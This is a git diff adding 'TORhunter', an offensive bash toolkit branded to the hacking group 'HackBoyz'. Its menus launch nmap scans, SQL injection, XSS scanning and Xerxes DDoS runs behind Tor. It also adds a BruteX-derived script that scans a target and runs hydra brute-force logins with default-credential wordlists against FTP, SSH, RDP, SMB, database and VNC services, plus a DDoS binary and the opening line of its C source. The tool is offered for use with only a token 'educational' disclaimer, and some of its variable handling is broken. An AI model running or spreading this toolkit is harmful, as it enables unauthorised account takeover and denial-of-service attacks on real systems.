diff --git a/TORhunter b/TORhunter new file mode 100644 index 0000000..ac57583 --- /dev/null +++ b/TORhunter @@ -0,0 +1,183 @@ +#!/bin/bash +# TORhunter +# Written by: Err0r_HB ~ HackBoyz (2020) +# Do NOT copy, noooooob! + +sudo +clear +for i in {80..226} {226..80} ; do echo -en "\033[38;5;${i}mBrought to you by: Err0r_HB \e[0m" ; done ; echo +sleep 3.4 + + function Vigilance_Recon +{ +option=0 +until [ "$option" = "1" ]; do +echo -e "\033[1;95m[\033[1;97m01\033[1;95m] \033[1;92mConnect to TOR/Proxy" +echo -e "\033[1;95m[\033[1;97m02\033[1;95m] \033[1;92mDisconnect TOR/PROXY" +echo -e "\033[1;95m[\033[1;97m03\033[1;95m] \033[1;92mNmap" +echo -e "\033[1;95m[\033[1;97m04\033[1;95m] \033[1;92mFull Port Scan" +echo -e "\033[1;95m[\033[1;97m05\033[1;95m] \033[1;92mCustom Port Scan" +echo -e "\033[1;95m[\033[1;97m06\033[1;95m] \033[1;92mCustom Proxy" +echo -e "\033[1;95m[\033[1;97m t\033[1;95m] \033[1;92mTarget Notes" +echo -e "\033[1;95m[\033[1;97m b\033[1;95m] \033[1;92mMain Menu" +echo "" +echo -e -n "\033[1;92mroot\033[1;95m@\033[1;96mtorhunter\033[1;97m:~# " +read option +echo "" +case $option in + 1 ) sudo terminator 2>/dev/null -e "sudo /home/YOUR_USER_NAME/TORhunter/proxy.sh" & ;; + 2 ) sudo service tor stop ;; + 3 ) sudo nmap 127.0.0.1 -PN ;; + 4 ) sudo terminator 2>/dev/null -e "sudo /home/YOUR_USER_NAME/TORhunter/nmap.sh" & ;; + 5 ) sudo terminator 2>/dev/null -e "sudo /home/YOUR_USER_NAME/TORhunter/cport.sh" & ;; + 6 ) sudo terminator 2>/dev/null -e "sudo /home/YOUR_USER_NAME/TORhunter/cproxy.sh" & ;; + t ) sudo terminator 2>/dev/null -e "sudo nano /home/YOUR_USER_NAME/TORhunter/targets.txt" & ;; + b ) main_menu ;; + * ) tput setf 4;echo "echo -n "root@torhunter:~#:"";tput setf 4; +esac +done + } + + + function Vengeance_Exploit +{ +option=0 +until [ "$option" = "2" ]; do +echo -e "\033[1;95m[\033[1;97m01\033[1;95m] \033[1;92mDatabase Exploit/Injection" +echo -e "\033[1;95m[\033[1;97m02\033[1;95m] \033[1;92mXSS/Vulnerability Scan" +echo -e "\033[1;95m[\033[1;97m03\033[1;95m] \033[1;92mFull Site Mapper" +echo -e "\033[1;95m[\033[1;97m04\033[1;95m] \033[1;92mDirectory Scan" +echo -e "\033[1;95m[\033[1;97m05\033[1;95m] \033[1;92mAutomated Password Cracking" +echo -e "\033[1;95m[\033[1;97m06\033[1;95m] \033[1;92mDDoS (Xerxes)" +echo -e "\033[1;95m[\033[1;97m07\033[1;95m] \033[1;92mDDoS (Xerxes x4 ) Port 8000" +echo -e "\033[1;95m[\033[1;97m08\033[1;95m] \033[1;92mCustomized DDoS" +echo -e "\033[1;95m[\033[1;97m t\033[1;95m] \033[1;92mTarget Notes" +echo -e "\033[1;95m[\033[1;97m b\033[1;95m] \033[1;92mMain Menu" +echo "" +echo -e -n "\033[1;92mroot\033[1;95m@\033[1;96mtorhunter:\033[1;97m~# " +read option +echo "" +case $option in + 1 ) sudo terminator 2>/dev/null -e "sudo /home/YOUR_USER_NAME/TORhunter/sql.sh" & ;; + 2 ) sudo terminator 2>/dev/null -e "sudo nikto -host 127.0.0.1 -port 8000" & ;; + 3 ) sudo terminator 2>/dev/null -e "sudo uniscan -u http://127.0.0.1:8000 -qwedsrgj" & ;; + 4 ) sudo terminator 2>/dev/null -e "sudo uniscan -u http://127.0.0.1:8000 -q" & ;; + 5 ) sudo terminator 2>/dev/null -e "sudo /home/YOUR_USER_NAME/TORhunter/bruTOR.sh" & ;; + 6 ) etherape 2>/dev/nul | sudo terminator 2>/dev/null -e "sudo /home/YOUR_USER_NAME/TORhunter/ddos.sh" & ;; + 7 ) etherape 2>/dev/nul | sudo terminator 2>/dev/null -e "sudo /home/YOUR_USER_NAME/TORhunter/ddosx4.sh" & ;; + 8 ) etherape 2>/dev/nul | sudo terminator 2>/dev/null -e "sudo /home/YOUR_USER_NAME/TORhunter/cDDoS" & ;; + t ) sudo terminator 2>/dev/null -e "sudo nano /home/YOUR_USER_NAME/TORhunter/targets.txt" & ;; + b ) main_menu ;; + * ) tput setf 4;echo "echo -n "root@torhunter:~#:"";tput setf 4; +esac +done + } + +clear +function Verbose_Report +{ +option=0 +until [ "$option" = "3" ]; do + echo -e "\033[1;95m[\033[1;97m01\033[1;95m] \033[1;92mGeolocate IP on a Map" + echo -e "\033[1;95m[\033[1;97m02\033[1;95m] \033[1;92mFile Uploader (Send Link in Email)" + echo -e "\033[1;95m[\033[1;97m03\033[1;95m] \033[1;92mAnonymous E-Mail" +echo -e "\033[1;95m[\033[1;97m t\033[1;95m] \033[1;92mTarget Notes" + echo -e "\033[1;95m[\033[1;97m b\033[1;95m] \033[1;92mMain Menu" +echo "" + echo -e -n "\033[1;92mroot\033[1;95m@\033[1;96mtorhunter\033[1;97m:~#: " + read option + echo "" + case $option in + 1 ) xdg-open 2>/dev/null https://iplocation.com/ ;; + 2 ) /home/YOUR_USER_NAME/.local/share/torbrowser/tbb/x86_64/tor-browser_en-US/Browser/start-tor-browser https://www.filedropper.com/ ;; + 3 ) /home/YOUR_USER_NAME/.local/share/torbrowser/tbb/x86_64/tor-browser_en-US/Browser/start-tor-browser https://protonirockerxow.onion/ --no-remote ;; + t ) terminator 2>/dev/null -e "sudo nano /home/YOUR_USER_NAME/TORhunter/targets.txt" & ;; + secret ) sudo terminator 2>/dev/null -e "sudo nano /home/YOUR_USER_NAME/TORhunter/wordlists/passswords.txt" & ;; + b ) main_menu ;; + * ) tput setf 3;echo "echo -n "root@torhunter:~#"";tput setf 3; + esac + done +} + +function main_menu +{ +option=0 +until [ "$option" = "4" ]; do + +clear +echo -e ''' +\e[1;91m ╔═══════════╗ +\e[1;91m ╔═╝\e[1;97m███████████\e[1;91m╚═╗ +\e[1;91m ╔╝\e[1;97m███████████████\e[1;91m╚╗ +\e[1;91m ║\e[1;97m██████\e[1;92mERR0R\e[1;97m██████\e[1;91m║ +\e[1;91m ║\e[1;97m█████████████████\e[1;91m║\e[1;91m +\e[1;91m ║\e[1;97m█████████████████\e[1;91m║\e[1;91m +\e[1;91m ║\e[1;97m█\e[1;91m╔\e[1;97m█████████████\e[1;91m╗\e[1;97m█\e[1;91m║\e[1;91m +\e[1;91m ╚╦╝\e[1;97m███\e[1;90m▒▒\e[1;97m███\e[1;90m▒▒\e[1;97m███\e[1;91m╚╦╝\e[1;91m +\e[1;91m ╔╝\e[1;97m██\e[1;90m▒▒▒▒\e[1;97m███\e[1;90m▒▒▒▒\e[1;97m██\e[1;91m╚╗\e[1;91m +\e[1;91m ║\e[1;97m██\e[1;90m▒▒▒▒▒\e[1;97m███\e[1;90m▒▒▒▒▒\e[1;97m██\e[1;91m|\e[1;91m +\e[1;91m ║\e[1;97m██\e[1;90m▒▒▒▒\e[1;97m█████\e[1;90m▒▒▒▒\e[1;97m██\e[1;91m║\e[1;94m +\e[1;91m ╚╗\e[1;97m███████████████\e[1;91m╔╝\e[1;94m +\e[1;91m ╔═╬══╦╝\e[1;97m██\e[1;90m▒\e[1;97m█\e[1;90m▒\e[1;97m██\e[1;91m╚╦══╝\e[1;90m .▒.. +\e[1;91m ║\e[1;97m█\e[1;91m║══║\e[1;97m█████████\e[1;91m║\e[1;90m ...▒. \e[1;93m +\e[1;91m ║\e[1;97m█\e[1;91m║══║\e[1;97m█\e[1;91m║\e[1;97m██\e[1;91m║\e[1;97m██\e[1;91m║\e[1;97m█\e[1;91m║\e[1;90m .▒.. +\e[1;91m ║\e[1;97m█\e[1;91m║══╚═╩══╩╦═╩═╩═╦╗\e[1;90m▒. +\e[1;91m ╔╝\e[1;97m█\e[1;91m╚══╦═╦══╦╩═╦═╦═╩╝ \e[38;5;48m +\e[1;91m╔╝\e[1;97m█████\e[1;91m║\e[1;97m█\e[1;91m║\e[1;97m██\e[1;91m║\e[1;97m██\e[1;91m║\e[1;97m█\e[1;91m║ +\e[1;91m║\e[1;97m██████\e[1;91m║\e[1;97m█████████\e[1;91m║ +''' +sleep 1.2 +echo -e ''' +\033[38;5;56m████████\033[38;5;199m╗\033[38;5;56m ██████\033[38;5;199m╗ \033[38;5;56m██████\033[38;5;199m╗ \033[38;5;56m██\033[38;5;199m╗ \033[38;5;56m██\033[38;5;199m╗\033[38;5;56m██\033[38;5;199m╗ \033[38;5;56m██\033[38;5;199m╗\033[38;5;56m███\033[38;5;199m╗ \033[38;5;56m██\033[38;5;199m╗\033[38;5;56m████████\033[38;5;199m╗\033[38;5;56m███████\033[38;5;199m╗\033[38;5;56m██████\033[38;5;199m╗ +\033[38;5;56m\033[38;5;199m╚══\033[38;5;56m██\033[38;5;199m╔══╝\033[38;5;56m██\033[38;5;199m╔═══\033[38;5;56m██\033[38;5;199m╗\033[38;5;56m██\033[38;5;199m╔══\033[38;5;56m██\033[38;5;199m╗\033[38;5;56m██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║\033[38;5;56m██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║\033[38;5;56m████\033[38;5;199m╗ \033[38;5;56m██\033[38;5;199m║╚══\033[38;5;56m██\033[38;5;199m╔══╝\033[38;5;56m██\033[38;5;199m╔════╝\033[38;5;56m██\033[38;5;199m╔══\033[38;5;56m██\033[38;5;199m╗ +\033[38;5;56m ██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║\033[38;5;56m██████\033[38;5;199m╔╝\033[38;5;56m███████\033[38;5;199m║\033[38;5;56m██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║\033[38;5;56m██\033[38;5;199m╔\033[38;5;56m██\033[38;5;199m╗ \033[38;5;56m██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║ \033[38;5;56m█████\033[38;5;199m╗ \033[38;5;56m██████\033[38;5;199m╔╝ +\033[38;5;56m ██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║\033[38;5;56m██\033[38;5;199m╔══\033[38;5;56m██\033[38;5;199m╗\033[38;5;56m██\033[38;5;199m╔══\033[38;5;56m██\033[38;5;199m║\033[38;5;56m██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║\033[38;5;56m██\033[38;5;199m║╚\033[38;5;56m██╗\033[38;5;56m██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m╔══╝ \033[38;5;56m██\033[38;5;199m╔══\033[38;5;56m██\033[38;5;199m╗ +\033[38;5;56m ██\033[38;5;199m║ ╚\033[38;5;56m██████\033[38;5;199m╔╝\033[38;5;56m██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║\033[38;5;56m██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║╚\033[38;5;56m██████\033[38;5;199m╔╝\033[38;5;56m██\033[38;5;199m║ ╚\033[38;5;56m████\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║ \033[38;5;56m███████\033[38;5;199m╗\033[38;5;56m██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║ +\033[38;5;199m ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ +''' +sleep 1 +echo -e """ +\e[38;5;197m ꧁෴╔══════════════════❖•ೋ°៚°ೋ•❖══════════════════╗෴꧂ +\e[1;91m ➣Name ⇶ TORhunter +\e[1;92m ➣Author → *ERR0R_HB* +\e[1;93m ➣Github ⇶ https://github.com/Err0r-ICA +\e[1;94m ➣Instagram → t.me/termuxxhacking +\e[1;96m ➣Telegram ⇶ @termux_hacking +\e[1;95m ➣Team → ~HACKBOYZ~ +\e[1;94m ➣Twitter ⇶ twitter.com/HHackboyz +\e[38;5;197m ꧁෴╚══════════════════❖•ೋ°៚°ೋ•❖══════════════════╝෴꧂ +\e[1;93m *Press 'CTRL + Z' to exit* + + \033[1;92m████\033[1;97m████\033[1;91m████ + \033[1;92m████\033[1;97m████\033[1;91m████ + \033[1;92m████\033[1;97m████\033[1;91m████ + \033[1;92m████\033[1;97m████\033[1;91m████ +""" +sleep 1.5 +echo -e " \033[1;91m@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@" +echo -e " \033[1;91m§\033[1;93mThis software is for educational purposes ONLY \033[1;91m§\n\033[1;91m §\033[1;93mAnd NOT6 meant to be used illegally in any way!\033[1;91m§" + echo -e " \033[1;91m#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#" +echo "" +echo "" + echo -e "\033[1;95m[\033[1;97m01\033[1;95m] \033[1;92mVigilance/Recon" +echo -e "\033[1;95m[\033[1;97m02\033[1;95m] \033[1;92mVengeance/Exploit" +echo -e "\033[1;95m[\033[1;97m03\033[1;95m] \033[1;92mVerbose/Report" +echo "" + echo -e "\033[1;95m[\033[1;97m g\033[1;95m] \033[1;97m\033[1;101mQuit\033[0m" +echo "" + echo -e "\033[1;93mType option or help and press \033[1;92mENTER" +echo "" + echo -e -n "\e[38;5;47mroot@\e[38;5;197mtorhunter:~# " +read option +echo "" +case $option in + 1 ) Vigilance_Recon ; ;; + 2 ) Vengeance_Exploit ; ;; + 3 ) Verbose_Report ; ;; + help ) xdg-open 2>/dev/null https://github.com/Err0r-ICA#usage ;; + q ) exit ;; + * ) tput setf 4;echo -n "root@torhunter:~#: ";tput setf 4; +esac +done + } +main_menu diff --git a/bruTOR b/bruTOR new file mode 100644 index 0000000..43a77dc --- /dev/null +++ b/bruTOR @@ -0,0 +1,329 @@ +#!/bin/bash +TARGET="$1" +PORT="$2" +VER="1.9" +LOOT_DIR=/root/Vigilante-Toolset/loot/ +FTP_USER_PASS="/root/Vigilante-Toolset/wordlists/ftp-default-userpass.txt" +FTP_USERS="/root/Vigilante-Toolset/wordlists/ftp_defuser.lst" +FTP_PASS="/root/Vigilante-Toolset/wordlists/ftp_defpass.lst" +SSH_USER_PASS="/root/Vigilante-Toolset/wordlists/ssh-default-userpass.txt" +SSH_USERS="/root/Vigilante-Toolset/wordlists/ssh_defuser.lst" +SSH_PASS="/root/Vigilante-Toolset/wordlists/ssh_defpass.lst" +SMTP_USERS="/root/Vigilante-Toolset/wordlists/smtp_defuser.lst" +SMTP_PASS="/root/Vigilante-Toolset/wordlists/smtp_defpass.lst" +POP_USERS="/root/Vigilante-Toolset/wordlists/pop_defusers.lst" +POP_PASS="/root/Vigilante-Toolset/wordlists/pop_defpass.lst" +TELNET_USER_PASS="/root/Vigilante-Toolset/wordlists/telnet-default-userpass.txt" +TELNET_USERS="/root/Vigilante-Toolset/wordlists/telnet_defuser.lst" +TELNET_PASS="/root/Vigilante-Toolset/wordlists/telnet_defpass.lst" +SQL_USERS="/root/Vigilante-Toolset/wordlists/sql_defuser.lst" +SQL_PASS="/root/Vigilante-Toolset/wordlists/sql_defpass.lst" +MSSQL_USER_PASS="/root/Vigilante-Toolset/wordlists/mssql-default-userpass.txt" +MYSQL_USER_PASS="/root/Vigilante-Toolset/wordlists/mysql-default-userpass.txt" +ORACLE_USER_PASS="/root/Vigilante-Toolset/wordlists/oracle-default-userpass.txt" +POSTGRES_USER_PASS="/root/Vigilante-Toolset/wordlists/postgres-default-userpass.txt" +WINDOWS_USER_LIST="/root/Vigilante-Toolset/wordlists/windows-users.txt" +WINDOWS_USER_PASS="/root/Vigilante-Toolset/wordlists/windows-default-userpass.txt" +USER_FILE="/root/Vigilante-Toolset/wordlists/simple-users.txt" +PASS_FILE="/root/Vigilante-Toolset/wordlists/password.lst" +SNMP_FILE="/root/Vigilante-Toolset/wordlists/snmp-strings.txt" +VNC_FILE="/root/Vigilante-Toolset/wordlists/vnc-default-passwords.txt" +HTTP_LOCATION="/" +THREADS="12" +COLOR1='\033[91m' +COLOR2='\033[92m' +COLOR3='\033[92m' +RESET='\e[0m' + +# UN-COMMENT TO ENABLE PROXY +#export HYDRA_PROXY=socks4://127.0.0.1:9050 + +#if [ -z $TARGET ]; then + #echo -e "$COLOR1 ____ ______ _____ ____ $RESET" + #echo -e "$COLOR1 /\ _`\ /\__ _\/\ __`\/\ _`\ $RESET" + #echo -e "$COLOR1 \ \ \L\ \ _ __ __ __\/_/\ \/\ \ \/\ \ \ \L\ \ $RESET" + #echo -e "$COLOR1 \ \ _ <'/\`'__\/\ \/\ \ \ \ \ \ \ \ \ \ \ , / $RESET" + #echo -e "$COLOR1 \ \ \L\ \ \ \/ \ \ \_\ \ \ \ \ \ \ \_\ \ \ \\ \ $RESET" + #echo -e "$COLOR1 \ \____/\ \_\ \ \____/ \ \_\ \ \_____\ \_\ \_\ $RESET" + #echo -e "$COLOR1 \/___/ \/_/ \/___/ \/_/ \/_____/\/_/\/ / $RESET" + # exit +#fi + +DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) + +echo -e "$COLOR1 $RESET" +echo -e "$COLOR1 $RESET" +echo -e "$COLOR1 $RESET" +echo -e "$COLOR1 $RESET" +echo -e "$COLOR1 $RESET" +echo -e "$COLOR1 $RESET" +echo "" +echo -e "$COLOR1 + -- --=[BruteX v$VER by @xer0dayz$RESET" +echo -e "$COLOR1 + -- --=[http://xerosecurity.com$RESET" +echo "" +echo "" + +echo -e "$COLOR3################################### Running Port Scan ##############################$RESET" +if [ -z "$PORT" ] +then + nmap -T4 -P0 --open $TARGET -p21,22,23,25,53,8000,110,139,162,389,443,445,512,513,514,993,1433,1521,3306,3389,5432,5900,5901,8000,8080,6667 -oX $LOOT_DIR/nmap-$TARGET.xml +else + nmap -T4 -P0 --open $TARGET -p $PORT -oX $LOOT_DIR/nmap-$TARGET.xml +fi +echo "" +echo -e "$COLOR3################################### Running Brute Force ############################$RESET" +echo "" +port_21=`grep 'portid="21"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_22=`grep 'portid="22"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_23=`grep 'portid="23"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_25=`grep 'portid="25"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_8000=`grep 'portid="8000"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_110=`grep 'portid="110"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_139=`grep 'portid="139"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_162=`grep 'portid="162"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_389=`grep 'portid="389"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_443=`grep 'portid="443"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_445=`grep 'portid="445"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_512=`grep 'portid="512"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_513=`grep 'portid="513"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_512=`grep 'portid="514"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_993=`grep 'portid="993"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_1433=`grep 'portid="1433"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_1521=`grep 'portid="1521"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_3306=`grep 'portid="3306"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_3389=`grep 'portid="3389"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_5432=`grep 'portid="5432"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_5900=`grep 'portid="5900"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_5901=`grep 'portid="5901"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_6667=`grep 'portid="6667"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_8000=`grep 'portid="8000"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_8080=`grep 'portid="8080"' $LOOT_DIR/nmap-$TARGET.xml | grep open` + +if [ -z "$port_21" ] +then + echo -e "$COLOR1 + -- --=[Port 21 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 21 opened... running tests...$RESET" + hydra -C $FTP_USER_PASS $TARGET ftp -t $THREADS -e ns + hydra -L $FTP_USERS -P $FTP_PASS $TARGET ftp -t $THREADS -e ns +fi + +if [ -z "$port_22" ] +then + echo -e "$COLOR1 + -- --=[Port 22 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 22 opened... running tests...$RESET" + hydra -C $SSH_USER_PASS $TARGET ssh -t $THREADS -e ns + hydra -L $USER_FILE -P $PASS_FILE $TARGET ssh -t $THREADS -e ns + hydra -L $SSH_USERS -P $SSH_PASS $TARGET ssh -t $THREADS -e ns +fi + +if [ -z "$port_23" ] +then + echo -e "$COLOR1 + -- --=[Port 23 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 23 opened... running tests...$RESET" + hydra -C $TELNET_USER_PASS $TARGET telnet -t $THREADS -e ns + hydra -L $USER_FILE -P $PASS_FILE $TARGET telnet -t $THREADS -e ns + hydra -L $TELNET_USERS -P $TELNET_PASS $TARGET telnet -t $THREADS -e ns +fi + +if [ -z "$port_25" ] +then + echo -e "$COLOR1 + -- --=[Port 25 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 25 opened... running tests...$RESET" + hydra -L $USER_FILE -P $PASS_FILE $TARGET smtp-enum -t $THREADS -e ns + hydra -L $USER_FILE -P $PASS_FILE $TARGET smtp -t $THREADS -e ns + hydra -L $SMTP_USERS -P $SMTP_PASS $TARGET smtp -t $THREADS -e ns +fi + +if [ -z "$port_8000" ] +then + echo -e "$COLOR1 + -- --=[Port 8000 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 8000 opened... running tests...$RESET" + hydra -L $USER_FILE -P $PASS_FILE $TARGET http-get -t $THREADS -f -q -e ns -m $HTTP_LOCATION -V +fi + +if [ -z "$port_110" ] +then + echo -e "$COLOR1 + -- --=[Port 110 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 110 opened... running tests...$RESET" + hydra -L $USER_FILE -P $PASS_FILE $TARGET pop3 -t $THREADS -e ns + hydra -L $POP_USERS -P $POP_PASS $TARGET pop3 -t $THREADS -e ns +fi + +if [ -z "$port_139" ] +then + echo -e "$COLOR1 + -- --=[Port 139 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 139 opened... running tests...$RESET" + hydra -L $WINDOWS_USER_LIST -P $PASS_FILE $TARGET smb -S 139 -t $THREADS -e ns +fi + +if [ -z "$port_162" ] +then + echo -e "$COLOR1 + -- --=[Port 162 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 162 opened... running tests...$RESET" + hydra -P $SNMP_FILE snmp -S 162 -t $THREADS -e ns +fi + +if [ -z "$port_389" ] +then + echo -e "$COLOR1 + -- --=[Port 389 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 389 opened... running tests...$RESET" + hydra -L $WINDOWS_USER_LIST -P $PASS_FILE $TARGET ldap2 -S 389 -t $THREADS -e ns + hydra -L $WINDOWS_USER_LIST -P $PASS_FILE $TARGET ldap3 -S 389 -t $THREADS -e ns +fi + +if [ -z "$port_443" ] +then + echo -e "$COLOR1 + -- --=[Port 443 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 443 opened... running tests...$RESET" + hydra -L $USER_FILE -P $PASS_FILE $TARGET https-get -s 443 -t $THREADS -f -q -e ns -m $HTTP_LOCATION +fi + +if [ -z "$port_445" ] +then + echo -e "$COLOR1 + -- --=[Port 445 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 445 opened... running tests...$RESET" + hydra -C $WINDOWS_USER_PASS $TARGET smb -S 445 -t $THREADS -e ns + hydra -L $WINDOWS_USER_LIST -P $PASS_FILE $TARGET smb -S 445 -t $THREADS -e ns +fi + +if [ -z "$port_512" ] +then + echo -e "$COLOR1 + -- --=[Port 512 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 512 opened... running tests...$RESET" + hydra -L $USER_FILE -P $PASS_FILE $TARGET rexec -S 512 -t $THREADS -e ns +fi + +if [ -z "$port_513" ] +then + echo -e "$COLOR1 + -- --=[Port 513 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 513 opened... running tests...$RESET" + hydra -L $USER_FILE -P $PASS_FILE $TARGET rlogin -S 513 -t $THREADS -e ns +fi + +if [ -z "$port_514" ] +then + echo -e "$COLOR1 + -- --=[Port 514 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 514 opened... running tests...$RESET" + hydra -L $USER_FILE -P $PASS_FILE $TARGET rsh -S 514 -t $THREADS -e ns +fi + +if [ -z "$port_993" ] +then + echo -e "$COLOR1 + -- --=[Port 993 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 993 opened... running tests...$RESET" + hydra -L $USER_FILE -P $PASS_FILE $TARGET imap -S 993 -t $THREADS -e ns +fi + +if [ -z "$port_1433" ] +then + echo -e "$COLOR1 + -- --=[Port 1433 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 1433 opened... running tests...$RESET" + hydra -C $MSSQL_USER_PASS $TARGET mssql -S 1433 -t $THREADS -e ns + hydra -L $WINDOWS_USER_LIST -P $PASS_FILE $TARGET mssql -S 1433 -t $THREADS -e ns +fi + +if [ -z "$port_1521" ] +then + echo -e "$COLOR1 + -- --=[Port 1521 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 1521 opened... running tests...$RESET" + hydra -C $ORACLE_USER_PASS $TARGET oracle -S 1521 -t $THREADS -e ns +fi + +if [ -z "$port_3306" ] +then + echo -e "$COLOR1 + -- --=[Port 3306 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 3306 opened... running tests...$RESET" + hydra -C $MYSQL_USER_PASS $TARGET mysql -t $THREADS -e ns + hydra -L $SQL_USERS -P $SQL_PASS $TARGET mysql -t $THREADS -e ns +fi + +if [ -z "$port_3389" ] +then + echo -e "$COLOR1 + -- --=[Port 3389 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 3389 opened... running tests...$RESET" + hydra -C $WINDOWS_USER_PASS $TARGET rdp -t $THREADS -e ns + hydra -L $WINDOWS_USER_LIST -P $PASS_FILE $TARGET rdp -t $THREADS -e ns +fi + +if [ -z "$port_5432" ] +then + echo -e "$COLOR1 + -- --=[Port 5432 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 5432 opened... running tests...$RESET" + hydra -C $POSTGRES_USER_PASS $TARGET postgres -t $THREADS -e ns +fi + +if [ -z "$port_5900" ] +then + echo -e "$COLOR1 + -- --=[Port 5900 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 5900 opened... running tests...$RESET" + hydra -P $VNC_FILE $TARGET vnc -S 5900 -t $THREADS -e ns + hydra -P $PASS_FILE $TARGET vnc -S 5900 -t $THREADS -e ns +fi + +if [ -z "$port_5901" ] +then + echo -e "$COLOR1 + -- --=[Port 5901 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 5901 opened... running tests...$RESET" + hydra -P $VNC_FILE $TARGET vnc -S 5901 -t $THREADS -e ns + hydra -P $PASS_FILE $TARGET vnc -S 5901 -t $THREADS -e ns +fi + +if [ -z "$port_6667" ] +then + echo -e "$COLOR1 + -- --=[Port 6667 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 6667 opened... running tests...$RESET" + hydra -L $USER_FILE -P $PASS_FILE $TARGET irc -s 6667 -t $THREADS -e ns +fi + +if [ -z "$port_8000" ] +then + echo -e "$COLOR1 + -- --=[Port 8000 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 8000 opened... running tests...$RESET" + hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -s 8000 -f -q -t $THREADS -e ns -m / +fi + +if [ -z "$port_8080" ] +then + echo -e "$COLOR1 + -- --=[Port 8080 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 8080 opened... running tests...$RESET" + hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -S 8080 -f -q -t $THREADS -e ns -m / +fi + +if [ -z "$port_8100" ] +then + echo -e "$COLOR1 + -- --=[Port 8100 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 8100 opened... running tests...$RESET" + hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -S 8100 -f -q -t $THREADS -e ns -m / +fi + +echo "" +echo -e "$COLOR3################################### Done! ###########################################$RESET" +exit 0 +# BruteX by @xer0dayz +# http://xerosecurity.co diff --git a/bruTOR.sh b/bruTOR.sh new file mode 100644 index 0000000..227404d --- /dev/null +++ b/bruTOR.sh @@ -0,0 +1,8 @@ +#!/bin/bash +echo "Use Nmap, menu 1 option 3, to see open ports." +echo "Ports like: 8000 or 80, 21, 22, 443; 8080," +echo +echo "Enter PORT:" +read vartport +sudo /home/binbash/Vigilante-Toolset/bruTOR 127.0.0.1 $varport +read -p "Press [Enter] key to start backup..." diff --git a/cDDoS b/cDDoS new file mode 100644 index 0000000..af0cd17 Binary files /dev/null and b/cDDoS differ diff --git a/cDDoS.c b/cDDoS.c new file mode 100644 index 0000000..c50e8c6 --- /dev/null +++ b/cDDoS.c @@ -0,0 +1,184 @@ +/* XerXes - Most powerful dos tool - THN (http://www.thehackernews.com) 